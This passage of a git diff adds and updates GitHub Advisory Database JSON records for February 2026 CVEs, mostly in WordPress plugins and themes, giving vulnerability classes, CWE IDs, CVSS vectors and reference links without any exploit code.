"https://patchstack.com/database/Wordpress/Theme/coworking/vulnerability/wordpress-coworking-theme-1-6-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-crh6-h7h3-f48v/GHSA-crh6-h7h3-f48v.json b/advisories/unreviewed/2026/02/GHSA-crh6-h7h3-f48v/GHSA-crh6-h7h3-f48v.json new file mode 100644 index 0000000000000..d5be2fb4ee203 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-crh6-h7h3-f48v/GHSA-crh6-h7h3-f48v.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-crh6-h7h3-f48v", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69394" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in cnvrse Cnvrse cnvrse allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Cnvrse: from n/a through <= 026.02.10.20.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69394" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/cnvrse/vulnerability/wordpress-cnvrse-plugin-025-12-24-01-insecure-direct-object-references-idor-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cvjq-fp7r-7jf7/GHSA-cvjq-fp7r-7jf7.json b/advisories/unreviewed/2026/02/GHSA-cvjq-fp7r-7jf7/GHSA-cvjq-fp7r-7jf7.json new file mode 100644 index 0000000000000..7e3bc31d2acca --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cvjq-fp7r-7jf7/GHSA-cvjq-fp7r-7jf7.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cvjq-fp7r-7jf7", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68837" + ], + "details": "Missing Authorization vulnerability in ELEXtensions ELEX WordPress HelpDesk & Customer Ticketing System elex-helpdesk-customer-support-ticket-system allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ELEX WordPress HelpDesk & Customer Ticketing System: from n/a through <= 3.3.5.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68837" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/elex-helpdesk-customer-support-ticket-system/vulnerability/wordpress-elex-wordpress-helpdesk-customer-ticketing-system-plugin-3-3-5-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cvm5-m63f-8wmv/GHSA-cvm5-m63f-8wmv.json b/advisories/unreviewed/2026/02/GHSA-cvm5-m63f-8wmv/GHSA-cvm5-m63f-8wmv.json new file mode 100644 index 0000000000000..0c2b2327fbe4e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cvm5-m63f-8wmv/GHSA-cvm5-m63f-8wmv.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cvm5-m63f-8wmv", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68843" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bas Schuiling FeedWordPress Advanced Filters faf allows Reflected XSS.This issue affects FeedWordPress Advanced Filters: from n/a through <= 0.6.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68843" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/faf/vulnerability/wordpress-feedwordpress-advanced-filters-plugin-0-6-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f29p-m33v-73cj/GHSA-f29p-m33v-73cj.json b/advisories/unreviewed/2026/02/GHSA-f29p-m33v-73cj/GHSA-f29p-m33v-73cj.json new file mode 100644 index 0000000000000..76513e81ddd5a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f29p-m33v-73cj/GHSA-f29p-m33v-73cj.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f29p-m33v-73cj", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68541" + ], + "details": "Deserialization of Untrusted Data vulnerability in BoldThemes Ippsum ippsum allows Object Injection.This issue affects Ippsum: from n/a through <= 1.2.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68541" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/ippsum/vulnerability/wordpress-ippsum-theme-1-2-0-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f3xp-j3c9-999x/GHSA-f3xp-j3c9-999x.json b/advisories/unreviewed/2026/02/GHSA-f3xp-j3c9-999x/GHSA-f3xp-j3c9-999x.json new file mode 100644 index 0000000000000..34a429cf89198 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f3xp-j3c9-999x/GHSA-f3xp-j3c9-999x.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f3xp-j3c9-999x", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67988" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in LoftOcean CozyStay cozystay allows PHP Local File Inclusion.This issue affects CozyStay: from n/a through < 1.9.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67988" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/cozystay/vulnerability/wordpress-cozystay-theme-1-9-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f647-638r-hxrw/GHSA-f647-638r-hxrw.json b/advisories/unreviewed/2026/02/GHSA-f647-638r-hxrw/GHSA-f647-638r-hxrw.json index 27cefef99b1d5..6928ccfaf97bf 100644 --- a/advisories/unreviewed/2026/02/GHSA-f647-638r-hxrw/GHSA-f647-638r-hxrw.json +++ b/advisories/unreviewed/2026/02/GHSA-f647-638r-hxrw/GHSA-f647-638r-hxrw.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-f647-638r-hxrw", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25330" ], "details": "Missing Authorization vulnerability in PublishPress PublishPress Authors publishpress-authors allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PublishPress Authors: from n/a through <= 4.10.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:17Z" diff --git a/advisories/unreviewed/2026/02/GHSA-f6p8-2gf3-784r/GHSA-f6p8-2gf3-784r.json b/advisories/unreviewed/2026/02/GHSA-f6p8-2gf3-784r/GHSA-f6p8-2gf3-784r.json new file mode 100644 index 0000000000000..45d14242b9829 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f6p8-2gf3-784r/GHSA-f6p8-2gf3-784r.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f6p8-2gf3-784r", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-60087" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Nenad Obradovic Extensive VC Addons for WPBakery page builder extensive-vc-addon allows PHP Local File Inclusion.This issue affects Extensive VC Addons for WPBakery page builder: from n/a through <= 1.9.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60087" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/extensive-vc-addon/vulnerability/wordpress-extensive-vc-addons-for-wpbakery-page-builder-plugin-1-9-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f6pr-2mv6-45fq/GHSA-f6pr-2mv6-45fq.json b/advisories/unreviewed/2026/02/GHSA-f6pr-2mv6-45fq/GHSA-f6pr-2mv6-45fq.json new file mode 100644 index 0000000000000..eb47df052da3f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f6pr-2mv6-45fq/GHSA-f6pr-2mv6-45fq.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f6pr-2mv6-45fq", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68846" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Paris Holley Asynchronous Javascript asynchronous-javascript allows Reflected XSS.This issue affects Asynchronous Javascript: from n/a through <= 1.3.5.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68846" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/asynchronous-javascript/vulnerability/wordpress-asynchronous-javascript-plugin-1-3-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f8c9-f59w-g5cx/GHSA-f8c9-f59w-g5cx.json b/advisories/unreviewed/2026/02/GHSA-f8c9-f59w-g5cx/GHSA-f8c9-f59w-g5cx.json new file mode 100644 index 0000000000000..3932b3ec69763 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f8c9-f59w-g5cx/GHSA-f8c9-f59w-g5cx.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f8c9-f59w-g5cx", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68862" + ], + "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Murtaza Bhurgri Woo File Dropzone woo-file-dropzone allows Path Traversal.This issue affects Woo File Dropzone: from n/a through <= 1.1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68862" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/woo-file-dropzone/vulnerability/wordpress-woo-file-dropzone-plugin-1-1-7-arbitrary-file-deletion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fc39-6hhj-gr5p/GHSA-fc39-6hhj-gr5p.json b/advisories/unreviewed/2026/02/GHSA-fc39-6hhj-gr5p/GHSA-fc39-6hhj-gr5p.json new file mode 100644 index 0000000000000..fe2cdcbe77e28 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fc39-6hhj-gr5p/GHSA-fc39-6hhj-gr5p.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fc39-6hhj-gr5p", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67971" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPManageNinja FluentCart fluent-cart allows Reflected XSS.This issue affects FluentCart: from n/a through < 1.3.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67971" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/fluent-cart/vulnerability/wordpress-fluentcart-plugin-1-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fg97-672q-6chv/GHSA-fg97-672q-6chv.json b/advisories/unreviewed/2026/02/GHSA-fg97-672q-6chv/GHSA-fg97-672q-6chv.json new file mode 100644 index 0000000000000..2bfd89a27a894 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fg97-672q-6chv/GHSA-fg97-672q-6chv.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fg97-672q-6chv", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-69298" + ], + "details": "Missing Authorization vulnerability in GhostPool Gauge gauge allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Gauge: from n/a through <= 6.56.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69298" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/gauge/vulnerability/wordpress-gauge-theme-6-56-4-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fqrw-hvqv-r58w/GHSA-fqrw-hvqv-r58w.json b/advisories/unreviewed/2026/02/GHSA-fqrw-hvqv-r58w/GHSA-fqrw-hvqv-r58w.json new file mode 100644 index 0000000000000..7ef6368fe1d80 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fqrw-hvqv-r58w/GHSA-fqrw-hvqv-r58w.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fqrw-hvqv-r58w", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26745" + ], + "details": "OpenSourcePOS 3.4.1 has a second order SQL Injection vulnerability in the handling of the currency_symbol configuration field. Although the input is initially stored without immediate execution, it is later concatenated into a dynamically constructed SQL query without proper sanitization or parameter binding. This allows an attacker with access to modify the currency_symbol value to inject arbitrary SQL expressions, which are executed when the affected query is subsequently processed.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26745" + }, + { + "type": "WEB", + "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2026-26745.md" + }, + { + "type": "WEB", + "url": "https://github.com/opensourcepos/opensourcepos" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g3qj-5j85-8w2c/GHSA-g3qj-5j85-8w2c.json b/advisories/unreviewed/2026/02/GHSA-g3qj-5j85-8w2c/GHSA-g3qj-5j85-8w2c.json new file mode 100644 index 0000000000000..df9d8756a17e9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g3qj-5j85-8w2c/GHSA-g3qj-5j85-8w2c.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g3qj-5j85-8w2c", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-53228" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jezza101 bbpress Simple Advert Units bbpress-simple-advert-units allows Reflected XSS.This issue affects bbpress Simple Advert Units: from n/a through <= 0.41.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53228" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/bbpress-simple-advert-units/vulnerability/wordpress-bbpress-simple-advert-units-plugin-0-41-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g5wr-mqvx-5c3v/GHSA-g5wr-mqvx-5c3v.json b/advisories/unreviewed/2026/02/GHSA-g5wr-mqvx-5c3v/GHSA-g5wr-mqvx-5c3v.json new file mode 100644 index 0000000000000..28c2bb9792dcb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g5wr-mqvx-5c3v/GHSA-g5wr-mqvx-5c3v.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g5wr-mqvx-5c3v", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68042" + ], + "details": "Missing Authorization vulnerability in Travelpayouts Travelpayouts travelpayouts allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Travelpayouts: from n/a through <= 1.2.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68042" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/travelpayouts/vulnerability/wordpress-travelpayouts-plugin-1-2-1-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gcfc-fjf7-2pj9/GHSA-gcfc-fjf7-2pj9.json b/advisories/unreviewed/2026/02/GHSA-gcfc-fjf7-2pj9/GHSA-gcfc-fjf7-2pj9.json new file mode 100644 index 0000000000000..d53f5c055eab5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gcfc-fjf7-2pj9/GHSA-gcfc-fjf7-2pj9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gcfc-fjf7-2pj9", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26097" + ], + "details": "Uncontrolled Search Path Element in Owl opds 2.2.0.4 allows Leveraging/Manipulating Configuration File Search Paths via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26097" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26097" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gfrr-w669-mfpw/GHSA-gfrr-w669-mfpw.json b/advisories/unreviewed/2026/02/GHSA-gfrr-w669-mfpw/GHSA-gfrr-w669-mfpw.json new file mode 100644 index 0000000000000..71ec755e47357 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gfrr-w669-mfpw/GHSA-gfrr-w669-mfpw.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gfrr-w669-mfpw", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-27504" + ], + "details": "SVXportal version 2.5 and prior contain a reflected cross-site scripting vulnerability in radiomobile_front.php via the stationid query parameter. When an authenticated administrator views a crafted URL, the application embeds the unsanitized parameter value into a hidden input value field, allowing attacker-supplied script injection and execution in the administrator's browser. This can be used to compromise admin sessions or perform unauthorized actions via the administrator's authenticated context.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27504" + }, + { + "type": "WEB", + "url": "https://github.com/sa2blv/SVXportal/blob/master/radiomobile_front.php" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/svxportal-radiomobile-front-php-stationid-reflected-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gj5f-4c2g-54hq/GHSA-gj5f-4c2g-54hq.json b/advisories/unreviewed/2026/02/GHSA-gj5f-4c2g-54hq/GHSA-gj5f-4c2g-54hq.json new file mode 100644 index 0000000000000..694d911126ff6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gj5f-4c2g-54hq/GHSA-gj5f-4c2g-54hq.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gj5f-4c2g-54hq", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:40Z", + "aliases": [ + "CVE-2026-2850" + ], + "details": "A vulnerability was found in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. This affects the function addCustomer/updateCustomer/deleteCustomer of the file dataset\\repos\\warehouse\\src\\main\\java\\com\\yeqifu\\bus\\controller\\CustomerController.java of the component Customer Endpoint. Performing a manipulation results in improper access controls. Remote exploitation of the attack is possible. The exploit has been made public and could be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2850" + }, + { + "type": "WEB", + "url": "https://github.com/yeqifu/warehouse/issues/61" + }, + { + "type": "WEB", + "url": "https://github.com/yeqifu/warehouse/issues/61#issue-3846669982" + }, + { + "type": "WEB", + "url": "https://github.com/yeqifu/warehouse" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347086" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347086" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754429" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T18:25:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gmmc-3vpq-7m4c/GHSA-gmmc-3vpq-7m4c.json b/advisories/unreviewed/2026/02/GHSA-gmmc-3vpq-7m4c/GHSA-gmmc-3vpq-7m4c.json new file mode 100644 index 0000000000000..9383fb52f68b9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gmmc-3vpq-7m4c/GHSA-gmmc-3vpq-7m4c.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gmmc-3vpq-7m4c", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22366" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Jude jude allows PHP Local File Inclusion.This issue affects Jude: from n/a through <= 1.3.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22366" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/jude/vulnerability/wordpress-jude-theme-1-3-0-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gpx9-88hq-9x47/GHSA-gpx9-88hq-9x47.json b/advisories/unreviewed/2026/02/GHSA-gpx9-88hq-9x47/GHSA-gpx9-88hq-9x47.json new file mode 100644 index 0000000000000..7bbd35202aeba --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gpx9-88hq-9x47/GHSA-gpx9-88hq-9x47.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gpx9-88hq-9x47", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69379" + ], + "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in vanquish Upload Files Anywhere wp-upload-files-anywhere allows Path Traversal.This issue affects Upload Files Anywhere: from n/a through <= 2.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69379" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wp-upload-files-anywhere/vulnerability/wordpress-upload-files-anywhere-plugin-2-8-arbitrary-file-deletion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gq95-fxhv-hvcp/GHSA-gq95-fxhv-hvcp.json b/advisories/unreviewed/2026/02/GHSA-gq95-fxhv-hvcp/GHSA-gq95-fxhv-hvcp.json index 7f4d9ff2f26dc..426bddaaaa21a 100644 --- a/advisories/unreviewed/2026/02/GHSA-gq95-fxhv-hvcp/GHSA-gq95-fxhv-hvcp.json +++ b/advisories/unreviewed/2026/02/GHSA-gq95-fxhv-hvcp/GHSA-gq95-fxhv-hvcp.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-gq95-fxhv-hvcp", - "modified": "2026-02-19T18:31:53Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:53Z", "aliases": [ "CVE-2026-25451" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in boldthemes Bold Page Builder bold-page-builder allows Stored XSS.This 